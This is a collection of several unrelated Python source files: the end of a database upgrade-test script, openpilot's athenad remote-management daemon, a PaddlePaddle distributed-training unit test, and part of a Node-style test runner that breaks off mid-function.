type=int,
default=0,
)
parser.add_argument(
"--redundancy",
help="Database redundancy level (default: single)",
type=str,
default="single",
)
parser.add_argument(
"--disable-log-dump",
help="Do not dump cluster log on error",
action="store_true",
)
parser.add_argument(
"--run-with-gdb", help="Execute the tester binary from gdb", action="store_true"
)
args = parser.parse_args()
if args.process_number == 0:
args.process_number = random.randint(1, 5)
print("Testing with {} processes".format(args.process_number))
assert len(args.upgrade_path) > 0, "Upgrade path must be specified"
    assert args.upgrade_path[0] in SUPPORTED_VERSIONS, "Upgrade path must begin with a valid version number"
if args.run_with_gdb:
RUN_WITH_GDB = True
errcode = 1
with UpgradeTest(args) as test:
print("log-dir: {}".format(test.log))
print("etc-dir: {}".format(test.etc))
print("data-dir: {}".format(test.data))
print("cluster-file: {}".format(test.etc.joinpath("fdb.cluster")))
errcode = test.exec_test(args)
if not test.check_cluster_logs():
errcode = 1 if errcode == 0 else errcode
test.dump_warnings_in_logs()
if errcode != 0 and not args.disable_log_dump:
test.dump_cluster_logs()
sys.exit(errcode)
|
athenad.py
|
#!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import sys
import queue
import random
import select
import socket
import threading
import time
from collections import namedtuple
from functools import partial
from typing import Any
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import ABNF, WebSocketTimeoutException, create_connection
import cereal.messaging as messaging
from cereal.services import service_list
from common.api import Api
from common.basedir import PERSIST
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.swaglog import cloudlog, SWAGLOG_DIR
import selfdrive.crash as crash
from selfdrive.version import dirty, origin, branch, commit
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://athena.comma.ai')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = set([8022])
LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
log_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id'])
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event)),
threading.Thread(target=ws_send, args=(ws, end_event)),
threading.Thread(target=upload_handler, args=(end_event,)),
threading.Thread(target=log_handler, args=(end_event,)),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,))
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "result" in data and "id" in data:
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
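# Illustrative only (never called): the shape of the JSON-RPC traffic that
# jsonrpc_handler() reads from recv_queue and writes to send_queue, using the
# built-in "echo" method registered above.
def _example_echo_roundtrip():
  request = json.dumps({"jsonrpc": "2.0", "method": "echo", "params": ["hello"], "id": 1})
  response = JSONRPCResponseManager.handle(request, dispatcher)
  # response.json is a JSON string carrying "result": "hello" and the same "id"
  return response.json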
def upload_handler(end_event):
while not end_event.is_set():
try:
item = upload_queue.get(timeout=1)
if item.id in cancelled_uploads:
cancelled_uploads.remove(item.id)
continue
_do_upload(item)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=10)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def listDataDirectory():
files = [os.path.relpath(os.path.join(dp, f), ROOT) for dp, dn, fn in os.walk(ROOT) for f in fn]
return files
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
if len(fn) == 0 or fn[0] == '/' or '..' in fn:
return 500
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
return 404
item = UploadItem(path=path, url=url, headers=headers, created_at=int(time.time() * 1000), id=None)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
return {"enqueued": 1, "item": item._asdict()}
@dispatcher.add_method
def listUploadQueue():
return [item._asdict() for item in list(upload_queue.queue)]
@dispatcher.add_method
def cancelUpload(upload_id):
upload_ids = set(item.id for item in list(upload_queue.queue))
if upload_id not in upload_ids:
return 404
cancelled_uploads.add(upload_id)
return {"success": 1}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
params = Params()
dongle_id = params.get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub', 'r') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import snapshot, jpeg_write
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# return logs in order they should be sent
# excluding most recent (active) log file
return sorted(logs[:-1])
def log_handler(end_event):
if PC:
return
log_files = []
last_scan = 0
log_retries = 0
while not end_event.is_set():
try:
try:
result = json.loads(log_recv_queue.get(timeout=1))
log_success = result.get("success")
log_entry = result.get("id")
log_path = os.path.join(SWAGLOG_DIR, log_entry)
if log_entry and log_success:
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
except queue.Empty:
pass
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# never send last log file because it is the active log
# and only send one log file at a time (most recent first)
if not len(log_files) or not log_send_queue.empty():
continue
log_entry = log_files.pop()
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path, "r") as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
log_send_queue.put_nowait(json.dumps(jsonrpc))
except OSError:
pass # file could be deleted by log rotation
log_retries = 0
except Exception:
cloudlog.exception("athena.log_handler.exception")
log_retries += 1
if log_retries != 0:
time.sleep(backoff(log_retries))
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
ssock.close()
local_sock.close()
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
signal_sock.close()
def ws_recv(ws, end_event):
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
Params().put("LastAthenaPingTime", str(int(sec_since_boot() * 1e9)))
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = log_send_queue.get(timeout=1)
ws.send(data)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
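# Rough illustration of the backoff bounds above: the upper limit (exclusive)
# of the random sleep grows as 2**retries and is capped at 128 seconds, so
# retries=1 -> 2, retries=3 -> 8, retries=7 and beyond -> 128.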
def main():
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
crash.init()
crash.bind_user(id=dongle_id)
crash.bind_extra(dirty=dirty, origin=origin, branch=branch, commit=commit,
device=HARDWARE.get_device_type())
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
ws.settimeout(1)
conn_retries = 0
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except Exception:
crash.capture_exception()
cloudlog.exception("athenad.main.exception")
conn_retries += 1
params.delete("LastAthenaPingTime")
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
test_dist_train.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import time
import unittest
from multiprocessing import Process
import numpy
import paddle.fluid as fluid
import paddle.fluid.layers as layers
class TestSendOp(unittest.TestCase):
@unittest.skip(
"This test is buggy. We cannot use time.sleep to sync processes, the connection may fail in unittest."
)
def test_send(self):
# Run init_serv in a thread
place = fluid.CPUPlace()
# NOTE: python thread will not work here due to GIL.
p = Process(target=self.init_serv, args=(place, ))
p.daemon = True
p.start()
time.sleep(10)
with open("/tmp/paddle.%d.port" % p.pid, "r") as fn:
selected_port = int(fn.readlines()[0])
self.init_client(place, selected_port)
self.run_local(place)
self.assertTrue(numpy.allclose(self.local_out, self.dist_out))
# FIXME(typhoonzero): find a way to gracefully shutdown the server.
os.system("kill -9 %d" % p.pid)
p.join()
def init_serv(self, place):
main = fluid.Program()
with fluid.program_guard(main):
serv = layers.ListenAndServ(
"127.0.0.1:0", ["X"], optimizer_mode=False)
with serv.do():
out_var = main.global_block().create_var(
name="scale_0.tmp_0",
                    persistable=True,
dtype="float32",
shape=[32, 32])
x = layers.data(
shape=[32, 32],
dtype='float32',
name="X",
append_batch_size=False)
fluid.initializer.Constant(value=1.0)(x, main.global_block())
layers.scale(x=x, scale=10.0, out=out_var)
self.server_exe = fluid.Executor(place)
self.server_exe.run(main)
def init_client(self, place, port):
main = fluid.Program()
with fluid.program_guard(main):
x = layers.data(
shape=[32, 32],
dtype='float32',
name='X',
append_batch_size=False)
fluid.initializer.Constant(value=2.3)(x, main.global_block())
get_var = main.global_block().create_var(
name="scale_0.tmp_0", # server side var
dtype="float32",
persistable=False,
shape=[32, 32])
o = layers.Send("127.0.0.1:%d" % port, [x], [get_var])
exe = fluid.Executor(place)
self.dist_out = exe.run(main, fetch_list=o) # o is a list
def run_local(self, place):
main = fluid.Program()
with fluid.program_guard(main):
x = layers.data(
shape=[32, 32],
dtype='float32',
name='X',
append_batch_size=False)
fluid.initializer.Constant(value=2.3)(x, main.global_block())
o = layers.scale(x=x, scale=10.0)
exe = fluid.Executor(place)
self.local_out = exe.run(main, fetch_list=[o])
if __name__ == "__main__":
unittest.main()
|
test.py
|
#!/usr/bin/env python
#
# Copyright 2008 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import print_function
import logging
import optparse
import os
import re
import signal
import subprocess
import sys
import tempfile
import time
import threading
import utils
import multiprocessing
import errno
import copy
if sys.version_info >= (3, 5):
from importlib import machinery, util
def get_module(name, path):
loader_details = (machinery.SourceFileLoader, machinery.SOURCE_SUFFIXES)
spec = machinery.FileFinder(path, loader_details).find_spec(name)
module = util.module_from_spec(spec)
spec.loader.exec_module(module)
return module
else:
import imp
def get_module(name, path):
file = None
try:
(file, pathname, description) = imp.find_module(name, [path])
return imp.load_module(name, file, pathname, description)
finally:
if file:
file.close()
from io import open
from os.path import join, dirname, abspath, basename, isdir, exists
from datetime import datetime
try:
from queue import Queue, Empty # Python 3
except ImportError:
from Queue import Queue, Empty # Python 2
from functools import reduce
try:
from urllib.parse import unquote # Python 3
except ImportError:
from urllib import unquote # Python 2
logger = logging.getLogger('testrunner')
skip_regex = re.compile(r'# SKIP\S*\s+(.*)', re.IGNORECASE)
VERBOSE = False
os.umask(0o022)
os.environ['NODE_OPTIONS'] = ''
# ---------------------------------------------
# --- P r o g r e s s I n d i c a t o r s ---
# ---------------------------------------------
class ProgressIndicator(object):
def __init__(self, cases, flaky_tests_mode):
self.cases = cases
self.serial_id = 0
self.flaky_tests_mode = flaky_tests_mode
self.parallel_queue = Queue(len(cases))
self.sequential_queue = Queue(len(cases))
for case in cases:
if case.parallel:
self.parallel_queue.put_nowait(case)
else:
self.sequential_queue.put_nowait(case)
self.succeeded = 0
self.remaining = len(cases)
self.total = len(cases)
self.failed = [ ]
self.flaky_failed = [ ]
self.crashed = 0
self.lock = threading.Lock()
self.shutdown_event = threading.Event()
def GetFailureOutput(self, failure):
output = []
if failure.output.stderr:
output += ["--- stderr ---" ]
output += [failure.output.stderr.strip()]
if failure.output.stdout:
output += ["--- stdout ---"]
output += [failure.output.stdout.strip()]
output += ["Command: %s" % EscapeCommand(failure.command)]
if failure.HasCrashed():
output += ["--- %s ---" % PrintCrashed(failure.output.exit_code)]
if failure.HasTimedOut():
output += ["--- TIMEOUT ---"]
output = "\n".join(output)
return output
def PrintFailureOutput(self, failure):
print(self.GetFailureOutput(failure))
def PrintFailureHeader(self, test):
if test.IsNegative():
negative_marker = '[negative] '
else:
negative_marker = ''
print("=== %(label)s %(negative)s===" % {
'label': test.GetLabel(),
'negative': negative_marker
})
print("Path: %s" % "/".join(test.path))
def Run(self, tasks):
self.Starting()
threads = []
# Spawn N-1 threads and then use this thread as the last one.
# That way -j1 avoids threading altogether which is a nice fallback
# in case of threading problems.
for i in range(tasks - 1):
thread = threading.Thread(target=self.RunSingle, args=[True, i + 1])
threads.append(thread)
thread.start()
try:
self.RunSingle(False, 0)
# Wait for the remaining threads
for thread in threads:
# Use a timeout so that signals (ctrl-c) will be processed.
thread.join(timeout=1000000)
except (KeyboardInterrupt, SystemExit):
self.shutdown_event.set()
except Exception:
# If there's an exception we schedule an interruption for any
# remaining threads.
self.shutdown_event.set()
# ...and then reraise the exception to bail out
raise
self.Done()
return not self.failed
def RunSingle(self, parallel, thread_id):
while not self.shutdown_event.is_set():
try:
test = self.parallel_queue.get_nowait()
except Empty:
if parallel:
return
try:
test = self.sequential_queue.get_nowait()
except Empty:
return
case = test
case.thread_id = thread_id
self.lock.acquire()
case.serial_id = self.serial_id
self.serial_id += 1
self.AboutToRun(case)
self.lock.release()
try:
start = datetime.now()
output = case.Run()
# SmartOS has a bug that causes unexpected ECONNREFUSED errors.
# See https://smartos.org/bugview/OS-2767
# If ECONNREFUSED on SmartOS, retry the test one time.
if (output.UnexpectedOutput() and
sys.platform == 'sunos5' and
'ECONNREFUSED' in output.output.stderr):
output = case.Run()
output.diagnostic.append('ECONNREFUSED received, test retried')
case.duration = (datetime.now() - start)
except IOError:
return
if self.shutdown_event.is_set():
return
self.lock.acquire()
if output.UnexpectedOutput():
if FLAKY in output.test.outcomes and self.flaky_tests_mode == DONTCARE:
self.flaky_failed.append(output)
else:
self.failed.append(output)
if output.HasCrashed():
self.crashed += 1
else:
self.succeeded += 1
self.remaining -= 1
self.HasRun(output)
self.lock.release()
def EscapeCommand(command):
parts = []
for part in command:
if ' ' in part:
# Escape spaces. We may need to escape more characters for this
# to work properly.
parts.append('"%s"' % part)
else:
parts.append(part)
return " ".join(parts)
class SimpleProgressIndicator(ProgressIndicator):
def Starting(self):
print('Running %i tests' % len(self.cases))
def Done(self):
print()
for failed in self.failed:
self.PrintFailureHeader(failed.test)
self.PrintFailureOutput(failed)
if len(self.failed) == 0:
print("===")
print("=== All tests succeeded")
print("===")
else:
print()
print("===")
print("=== %i tests failed" % len(self.failed))
if self.crashed > 0:
print("=== %i tests CRASHED" % self.crashed)
print("===")
class VerboseProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
print('Starting %s...' % case.GetLabel())
sys.stdout.flush()
def HasRun(self, output):
if output.UnexpectedOutput():
if output.HasCrashed():
outcome = 'CRASH'
else:
outcome = 'FAIL'
else:
outcome = 'pass'
print('Done running %s: %s' % (output.test.GetLabel(), outcome))
class DotsProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
pass
def HasRun(self, output):
total = self.succeeded + len(self.failed)
if (total > 1) and (total % 50 == 1):
sys.stdout.write('\n')
if output.UnexpectedOutput():
if output.HasCrashed():
sys.stdout.write('C')
sys.stdout.flush()
elif output.HasTimedOut():
sys.stdout.write('T')
sys.stdout.flush()
else:
sys.stdout.write('F')
sys.stdout.flush()
else:
sys.stdout.write('.')
sys.stdout.flush()
class ActionsAnnotationProgressIndicator(DotsProgressIndicator):
def GetAnnotationInfo(self, test, output):
traceback = output.stdout + output.stderr
find_full_path = re.search(r' +at .*\(.*%s:([0-9]+):([0-9]+)' % test.file, traceback)
col = line = 0
if find_full_path:
line, col = map(int, find_full_path.groups())
root_path = abspath(join(dirname(__file__), '../')) + os.sep
filename = test.file.replace(root_path, "")
return filename, line, col
def PrintFailureOutput(self, failure):
output = self.GetFailureOutput(failure)
filename, line, column = self.GetAnnotationInfo(failure.test, failure.output)
print("::error file=%s,line=%d,col=%d::%s" % (filename, line, column, output.replace('\n', '%0A')))
class TapProgressIndicator(SimpleProgressIndicator):
def _printDiagnostic(self):
logger.info(' severity: %s', self.severity)
self.exitcode and logger.info(' exitcode: %s', self.exitcode)
logger.info(' stack: |-')
for l in self.traceback.splitlines():
logger.info(' ' + l)
def Starting(self):
logger.info('TAP version 13')
logger.info('1..%i' % len(self.cases))
self._done = 0
def AboutToRun(self, case):
pass
def HasRun(self, output):
self._done += 1
self.traceback = ''
self.severity = 'ok'
self.exitcode = ''
# Print test name as (for example) "parallel/test-assert". Tests that are
# scraped from the addons documentation are all named test.js, making it
# hard to decipher what test is running when only the filename is printed.
prefix = abspath(join(dirname(__file__), '../test')) + os.sep
command = output.command[-1]
command = NormalizePath(command, prefix)
if output.UnexpectedOutput():
status_line = 'not ok %i %s' % (self._done, command)
self.severity = 'fail'
self.exitcode = output.output.exit_code
self.traceback = output.output.stdout + output.output.stderr
if FLAKY in output.test.outcomes and self.flaky_tests_mode == DONTCARE:
status_line = status_line + ' # TODO : Fix flaky test'
self.severity = 'flaky'
logger.info(status_line)
if output.HasCrashed():
self.severity = 'crashed'
elif output.HasTimedOut():
self.severity = 'fail'
else:
skip = skip_regex.search(output.output.stdout)
if skip:
logger.info(
'ok %i %s # skip %s' % (self._done, command, skip.group(1)))
else:
status_line = 'ok %i %s' % (self._done, command)
if FLAKY in output.test.outcomes:
status_line = status_line + ' # TODO : Fix flaky test'
logger.info(status_line)
if output.diagnostic:
self.severity = 'ok'
if isinstance(output.diagnostic, list):
self.traceback = '\n'.join(output.diagnostic)
else:
self.traceback = output.diagnostic
duration = output.test.duration
# total_seconds() was added in 2.7
total_seconds = (duration.microseconds +
(duration.seconds + duration.days * 24 * 3600) * 10**6) / 10**6
# duration_ms is measured in seconds and is read as such by TAP parsers.
# It should read as "duration including ms" rather than "duration in ms"
logger.info(' ---')
logger.info(' duration_ms: %d.%d' %
(total_seconds, duration.microseconds / 1000))
if self.severity != 'ok' or self.traceback != '':
if output.HasTimedOut():
self.traceback = 'timeout\n' + output.output.stdout + output.output.stderr
self._printDiagnostic()
logger.info(' ...')
def Done(self):
pass
class DeoptsCheckProgressIndicator(SimpleProgressIndicator):
def Starting(self):
pass
def AboutToRun(self, case):
pass
def HasRun(self, output):
# Print test name as (for example) "parallel/test-assert". Tests that are
# scraped from the addons documentation are all named test.js, making it
# hard to decipher what test is running when only the filename is printed.
prefix = abspath(join(dirname(__file__), '../test')) + os.sep
command = output.command[-1]
command = NormalizePath(command, prefix)
stdout = output.output.stdout.strip()
printed_file = False
for line in stdout.splitlines():
if (
(line.startswith("[aborted optimiz") or line.startswith("[disabled optimiz")) and
("because:" in line or "reason:" in line)
):
if not printed_file:
printed_file = True
print('==== %s ====' % command)
self.failed.append(output)
print(' %s' % line)
def Done(self):
pass
class CompactProgressIndicator(ProgressIndicator):
def __init__(self, cases, flaky_tests_mode, templates):
super(CompactProgressIndicator, self).__init__(cases, flaky_tests_mode)
self.templates = templates
self.last_status_length = 0
self.start_time = time.time()
def Starting(self):
pass
def Done(self):
self.PrintProgress('Done\n')
def AboutToRun(self, case):
self.PrintProgress(case.GetLabel())
def HasRun(self, output):
if output.UnexpectedOutput():
self.ClearLine(self.last_status_length)
self.PrintFailureHeader(output.test)
stdout = output.output.stdout.strip()
if len(stdout):
print(self.templates['stdout'] % stdout)
stderr = output.output.stderr.strip()
if len(stderr):
print(self.templates['stderr'] % stderr)
print("Command: %s" % EscapeCommand(output.command))
if output.HasCrashed():
print("--- %s ---" % PrintCrashed(output.output.exit_code))
if output.HasTimedOut():
print("--- TIMEOUT ---")
def Truncate(self, str, length):
if length and (len(str) > (length - 3)):
return str[:(length-3)] + "..."
else:
return str
def PrintProgress(self, name):
self.ClearLine(self.last_status_length)
elapsed = time.time() - self.start_time
status = self.templates['status_line'] % {
'passed': self.succeeded,
'remaining': (((self.total - self.remaining) * 100) // self.total),
'failed': len(self.failed),
'test': name,
'mins': int(elapsed) / 60,
'secs': int(elapsed) % 60
}
status = self.Truncate(status, 78)
self.last_status_length = len(status)
print(status, end='')
sys.stdout.flush()
class ColorProgressIndicator(CompactProgressIndicator):
def __init__(self, cases, flaky_tests_mode):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|\033[34m%%%(remaining) 4d\033[0m|\033[32m+%(passed) 4d\033[0m|\033[31m-%(failed) 4d\033[0m]: %(test)s",
'stdout': "\033[1m%s\033[0m",
'stderr': "\033[31m%s\033[0m",
}
super(ColorProgressIndicator, self).__init__(cases, flaky_tests_mode, templates)
def ClearLine(self, last_line_length):
print("\033[1K\r", end='')
class MonochromeProgressIndicator(CompactProgressIndicator):
def __init__(self, cases, flaky_tests_mode):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|%%%(remaining) 4d|+%(passed) 4d|-%(failed) 4d]: %(test)s",
'stdout': '%s',
'stderr': '%s',
'clear': lambda last_line_length: ("\r" + (" " * last_line_length) + "\r"),
'max_length': 78
}
super(MonochromeProgressIndicator, self).__init__(cases, flaky_tests_mode, templates)
def ClearLine(self, last_line_length):
print(("\r" + (" " * last_line_length) + "\r"), end='')
PROGRESS_INDICATORS = {
'verbose': VerboseProgressIndicator,
'dots': DotsProgressIndicator,
'actions': ActionsAnnotationProgressIndicator,
'color': ColorProgressIndicator,
'tap': TapProgressIndicator,
'mono': MonochromeProgressIndicator,
'deopts': DeoptsCheckProgressIndicator
}
# -------------------------
# --- F r a m e w o r k ---
# -------------------------
class CommandOutput(object):
def __init__(self, exit_code, timed_out, stdout, stderr):
self.exit_code = exit_code
self.timed_out = timed_out
self.stdout = stdout
self.stderr = stderr
self.failed = None
class TestCase(object):
def __init__(self, context, path, arch, mode):
self.path = path
self.context = context
self.duration = None
self.arch = arch
self.mode = mode
self.parallel = False
self.disable_core_files = False
self.serial_id = 0
self.thread_id = 0
def IsNegative(self):
return self.context.expect_fail
def DidFail(self, output):
if output.failed is None:
output.failed = self.IsFailureOutput(output)
return output.failed
def IsFailureOutput(self, output):
return output.exit_code != 0
def GetSource(self):
return "(no source available)"
def RunCommand(self, command, env):
full_command = self.context.processor(command)
output = Execute(full_command,
self.context,
self.context.GetTimeout(self.mode),
env,
disable_core_files = self.disable_core_files)
return TestOutput(self,
full_command,
output,
self.context.store_unexpected_output)
def Run(self):
try:
result = self.RunCommand(self.GetCommand(), {
"TEST_SERIAL_ID": "%d" % self.serial_id,
"TEST_THREAD_ID": "%d" % self.thread_id,
"TEST_PARALLEL" : "%d" % self.parallel
})
finally:
# Tests can leave the tty in non-blocking mode. If the test runner
# tries to print to stdout/stderr after that and the tty buffer is
# full, it'll die with a EAGAIN OSError. Ergo, put the tty back in
# blocking mode before proceeding.
if sys.platform != 'win32':
from fcntl import fcntl, F_GETFL, F_SETFL
from os import O_NONBLOCK
for fd in 0,1,2: fcntl(fd, F_SETFL, ~O_NONBLOCK & fcntl(fd, F_GETFL))
return result
class TestOutput(object):
def __init__(self, test, command, output, store_unexpected_output):
self.test = test
self.command = command
self.output = output
self.store_unexpected_output = store_unexpected_output
self.diagnostic = []
def UnexpectedOutput(self):
if self.HasCrashed():
outcome = CRASH
elif self.HasTimedOut():
outcome = TIMEOUT
elif self.HasFailed():
outcome = FAIL
else:
outcome = PASS
return not outcome in self.test.outcomes
def HasCrashed(self):
if utils.IsWindows():
return 0x80000000 & self.output.exit_code and not (0x3FFFFF00 & self.output.exit_code)
else:
# Timed out tests will have exit_code -signal.SIGTERM.
if self.output.timed_out:
return False
return self.output.exit_code < 0
def HasTimedOut(self):
return self.output.timed_out
def HasFailed(self):
execution_failed = self.test.DidFail(self.output)
if self.test.IsNegative():
return not execution_failed
else:
return execution_failed
def KillProcessWithID(pid, signal_to_send=signal.SIGTERM):
if utils.IsWindows():
os.popen('taskkill /T /F /PID %d' % pid)
else:
